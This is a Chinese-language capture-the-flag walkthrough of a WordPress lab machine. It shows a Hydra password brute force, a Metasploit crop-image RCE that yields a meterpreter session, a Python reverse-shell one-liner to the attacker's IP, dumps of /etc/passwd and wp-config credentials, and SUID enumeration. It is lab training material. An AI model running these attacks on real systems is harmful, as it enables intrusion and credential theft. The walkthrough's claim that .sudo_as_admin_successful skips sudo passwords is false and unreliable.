22
23
24
HTTP/1.1 200 OK
Date: Wed, 02 Aug 2023 10:37:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 4072
Connection: close
Content-Type: text/html; charset=UTF-8
<div id="login_error"> <strong>ERROR</strong>: The password you entered for the username <strong>kwheel</strong> is incorrect. <a href="http://blog.thm/wp-login.php?action=lostpassword">Lost your password?</a><br />
</div>
这个hydra命令用于对目标WordPress网站(IP地址为10.10.143.236)进行密码暴力破解。它尝试使用用户名 “kwheel” 和rockyou.txt字典中的不同密码组合进行登录。
命令参数的解释如下:
-l kwheel: 这是指定用户名为 “kwheel”,这是你尝试登录的用户名。-P /usr/share/wordlists/rockyou.txt: 这是指定密码字典文件的路径,使用rockyou.txt字典来尝试不同的密码组合。10.10.143.236: 这是目标WordPress网站的IP地址。http-post-form: 这告诉hydra要使用HTTP POST请求进行表单提交。"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1": 这是登录表单的字段和参数,其中^USER^和^PASS^是占位符,hydra会用用户名字典中的不同用户名替换^USER^,用密码字典中的不同密码替换^PASS^。F=The password you entered for the username: 这是hydra在密码错误时返回的错误消息。
根据hydra的输出,它似乎在尝试使用 “kwheel” 用户名和rockyou.txt字典中的不同密码组合进行暴力破解。然后,hydra返回错误消息 “The password you entered for the username”,这意味着尝试登录的密码不正确。
hydra会持续尝试使用密码字典中的不同密码组合,直到找到正确的密码或遍历整个密码字典为止。
请注意,密码暴力破解是一种低效且不推荐的渗透测试方法。在真实环境中,密码暴力破解容易被检测到,并可能导致账户锁定或其他安全措施。在合法授权的渗透测试中,应该优先考虑更有效且不易被检测的方法,如社交工程、漏洞利用等。在使用密码暴力破解或其他渗透测试工具时,请确保你已经获得了授权,并且只在授权范围内进行测试。
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Downloads]
└─# hydra -l kwheel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 06:46:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.143.236:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username
[STATUS] 687.00 tries/min, 687 tries in 00:01h, 14343712 to do in 347:59h, 16 active
[STATUS] 678.67 tries/min, 2036 tries in 00:03h, 14342363 to do in 352:14h, 16 active
[80][http-post-form] host: 10.10.143.236 login: kwheel password: cutiepie1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 06:51:30
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Downloads]
└─# hydra -l bjoel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 07:25:29
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.143.236:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username
[STATUS] 654.00 tries/min, 654 tries in 00:01h, 14343745 to do in 365:33h, 16 active
[STATUS] 663.67 tries/min, 1991 tries in 00:03h, 14342408 to do in 360:11h, 16 active
[STATUS] 658.14 tries/min, 4607 tries in 00:07h, 14339792 to do in 363:09h, 16 active
[80][http-post-form] host: 10.10.143.236 login: bjoel
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 07:32:45
只发现一个有效用户名和密码:
login: kwheel password: cutiepie1
所以之前一个账户暴力破解出16个密码其实是因为错误消息没有设置正确。:)
1
hydra -l bjoel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username"
使用上述用户名密码登录进Wordpress后台:http://blog.thm/wp-admin/
WordPress 5.0 running Twenty Twenty theme.
Version 5.0
在Posts中发现了名为:jiXvfuIpdw 的草稿。猜测可能是某个密码?
jiXvfuIpdw
在Comments中获得邮箱信息:
Karen Wheeler
nconkl1190@gmail.com
192.168.196.1
Billy Joel
nconkl1@outlook.com
192.168.196.1
在Profile中发现以下信息:
Username : kwheel
First Name : Karen
Last Name : Wheeler
Nickname (required) : kwheel
Display name publicly as : Karen Wheeler
Email (required) : zlbiydwrtfjhmuuymk@ttirv.net
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit WordPress 5.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi | php/webapps/51042.txt
WordPress 5.0.0 - Image Remote Code Execution | php/webapps/49512.py
WordPress Core 5.0 - Remote Code Execution | php/webapps/46511.js
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) | php/remote/46662.rb
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(root㉿kali)-[~/Downloads]
└─# msfconsole -q
[*] Starting persistent handler(s)...
msf6 > search WordPress 5.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
1 exploit/unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability
2 auxiliary/scanner/http/wp_woocommerce_payments_add_user 2023-03-22 normal Yes Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation
3 auxiliary/scanner/http/wp_registrationmagic_sqli 2022-01-23 normal Yes Wordpress RegistrationMagic task_ids Authenticated SQLi
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/http/wp_registrationmagic_sqli
msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.117.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.143.236
RHOSTS => 10.10.143.236
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 10.10.143.236
[*] Meterpreter session 1 opened (10.18.72.222:4444 -> 10.10.143.236:50900) at 2023-08-02 08:02:31 -0400
[*] Attempting to clean up files...
meterpreter >
1
2
3
4
5
6
meterpreter > sysinfo
Computer : blog
OS : Linux blog 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bjoel:x:1000:1000:Billy Joel:/home/bjoel:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
smb:x:1001:1001::/srv/smb/files:/usr/sbin/nologin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
meterpreter > shell
Process 2177 created.
Channel 2 created.
/bin/bash -i
bash: cannot set terminal process group (918): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blog:/var/www/wordpress$ cd /home/
cd /home/
www-data@blog:/home$ ls
ls
bjoel
www-data@blog:/home$ cd bjoel
cd bjoel
www-data@blog:/home/bjoel$ ls
ls
Billy_Joel_Termination_May20-2020.pdf
user.txt
www-data@blog:/home/bjoel$ cat user.txt
cat user.txt
You won't find what you're looking for here.
TRY HARDER
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@blog:/home/bjoel$ uname -a
uname -a
Linux blog 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@blog:/home/bjoel$ netstat -antup
netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 624 10.10.143.236:50900 10.18.72.222:4444 ESTABLISHED 2177/sh
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 1 0 10.10.143.236:80 10.18.72.222:38817 CLOSE_WAIT -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.143.236:68 0.0.0.0:* -
udp 0 0 10.10.255.255:137 0.0.0.0:* -
udp 0 0 10.10.143.236:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.255.255:138 0.0.0.0:* -
udp 0 0 10.10.143.236:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
内核提权的可能性不大,这里省略。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
www-data@blog:/tmp$ cd /var/www/wordpress
cd /var/www/wordpress
www-data@blog:/var/www/wordpress$ ls
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
zsKKjKSASz.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
www-data@blog:/var/www/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
/* Custom */
/*
define('WP_HOME', '/');
define('WP_SITEURL', '/'); */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'LittleYellowLamp90!@');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/** Custom FS Method */
define('FS_METHOD', 'direct');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'ZCgJQaT0(*+Zjo}Iualapeo|?~nMtp^1IUrquYx3!#T$ihW8F~_`L+$N E>J!Bm;');
define('SECURE_AUTH_KEY', 'nz|(+d|| yVX-5_on76q%:M, ?{NVJ,Q(;p3t|_B*]-yQ&|]3}M@Po!f_,T-S4fe');
define('LOGGED_IN_KEY', 'a&I&DR;PUnPKul^kLBgxYa@`g||{eZf><sf8SmKBi+R7`O?](SuL&/H#hqzO$_:3');
define('NONCE_KEY', 'Vdd-zzB:/yxg6unZvng,oY-%Z V,i%+Uz_f)S;Efz!;cY3p~]T,g1z*Z[jXe>5Sm');
define('AUTH_SALT', 'u+k8g;=jbe)6/X~<M1HwINhH(Tno@orx:$_$-#*id)ddBYGGF(]AP?}4?2E|m;5`');
define('SECURE_AUTH_SALT', '>Rg5>,/^BywVg^A[Etqot:CoU+9<)YPM~h|)Ifd5!iK!L*5+JDiZi33KrYZNd2B7');
define('LOGGED_IN_SALT', '3kpL-rcnU+>H#t/g>9<)j/u I1/-Ws;h6GrDQ>v8%7@C~`h1lBC/euttp)/8EdA_');
define('NONCE_SALT', 'JEajZ)y?&.m-1^$(c-JX$zi0qv|7]F%7a6jh]P5SRs+%`*60?WJVk$><b$poQg9>');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > ls
Listing: /home/bjoel
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2023-08-02 06:28:15 -0400 .bash_history
100644/rw-r--r-- 220 fil 2018-04-04 14:30:26 -0400 .bash_logout
100644/rw-r--r-- 3771 fil 2018-04-04 14:30:26 -0400 .bashrc
040700/rwx------ 4096 dir 2020-05-25 09:15:58 -0400 .cache
040700/rwx------ 4096 dir 2020-05-25 09:15:58 -0400 .gnupg
100644/rw-r--r-- 807 fil 2018-04-04 14:30:26 -0400 .profile
100644/rw-r--r-- 0 fil 2020-05-25 09:16:22 -0400 .sudo_as_admin_successful
100644/rw-r--r-- 69106 fil 2020-05-26 14:33:24 -0400 Billy_Joel_Termination_May20-2020.pdf
100644/rw-r--r-- 57 fil 2020-05-26 16:08:47 -0400 user.txt
发现隐藏文件:.sudo_as_admin_successful
1
2
3
www-data@blog:/home/bjoel$ python --version
python --version
Python 2.7.17
1
2
3
┌──(root㉿kali)-[~]
└─# nc -nvlp 4433
listening on [any] 4433 ...
获取一个Reverse Shell
1
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
1
2
www-data@blog:/home/bjoel$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
<no(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
注意到bjoel是sudo、adm group。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,bjoel
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:bjoel
floppy:x:25:
tape:x:26:
sudo:x:27:bjoel
audio:x:29:
dip:x:30:bjoel
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:bjoel
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
lxd:x:108:
mlocate:x:109:
uuidd:x:110:
ssh:x:111:
landscape:x:112:
bjoel:x:1000:
ssl-cert:x:113:
mysql:x:114:
rdma:x:115:
sambashare:x:116:
smb:x:1001:
1
2
3
$ groups bjoel
groups bjoel
bjoel : bjoel adm cdrom sudo dip plugdev
.sudo_as_admin_successful 是一个隐藏文件,它不是环境变量。在Ubuntu系统中,当你使用sudo命令以管理员权限执行命令时,系统会在用户的家目录中创建一个名为 .sudo_as_admin_successful 的隐藏文件。该文件的存在表示你上一次使用sudo成功地以管理员权限执行了命令。
这个隐藏文件的作用是避免在短时间内重复输入密码。当你再次使用sudo命令时,如果.sudo_as_admin_successful文件存在,系统会允许你直接以管理员权限执行命令,而无需再次输入密码。这样可以提高用户体验和便利性。
请注意,这个隐藏文件仅对你当前的用户有效,并且只适用于一定的时间段(通常是几分钟)。过了一段时间后,系统会再次要求你输入密码以确保安全性。
如果你不希望使用.sudo_as_admin_successful文件来避免重复输入密码,你可以手动删除这个文件。删除该文件不会对系统造成任何影响,只是在下次使用sudo时需要重新输入密码。
这个文件的完整路径是:/home/your_username/.sudo_as_admin_successful,其中 your_username 是你的用户名。由于这是一个隐藏文件,如果你在文件浏览器中查看家目录,你可能需要显示隐藏文件才能看到它。在终端中,你可以使用 ls -a 命令查看包括隐藏文件在内的所有文件。
Pentest-Cheatsheets/privilege-escalation/linux/linux-examples.rst
SUID 可执行文件 共享对象注入 共享对象(.so)是 *nix 系统中类似于 Windows DLL 的文件。如果一个程序引用了一个我们可以写入的共享对象(即使它不存在),我们就可以以应用程序的用户上下文运行命令。
查找 SUID/SGID 可执行文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
$ find / -type f -a \( -perm -u+s -o -perm -u+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -a \( -perm -u+s -o -perm -u+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 root root 8432 May 26 2020 /usr/sbin/checker
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
-rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9066/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9066/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9066/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9066/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9066/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9066/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9066/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9066/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9066/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Apr 10 2020 /snap/core/9066/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9066/usr/sbin/pppd
使用 strace 来查找对共享对象的引用:
1
2
3
4
5
6
7
8
9
$ strace /usr/sbin/checker 2>&1 | grep -iE "open|access|no such file"
strace /usr/sbin/checker 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
/usr/sbin/checker不是常见的拥有SUID的二进制文件!
1
2
3
$ checker
checker
Not an Admin
1
2
3
$ ls -al /usr/sbin/checker
ls -al /usr/sbin/checker
-rwsr-sr-x 1 root root 8432 May 26 2020 /usr/sbin/checker
1
2
3
4
5
6
$ ltrace checker
ltrace checker
getenv("admin") = nil
puts("Not an Admin"Not an Admin
) = 13
+++ exited (status 0) +++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ env
env
SHLVL=1
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:19937
_=checker
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
INVOCATION_ID=bf008a68e4af4e379e925a112018a4fc
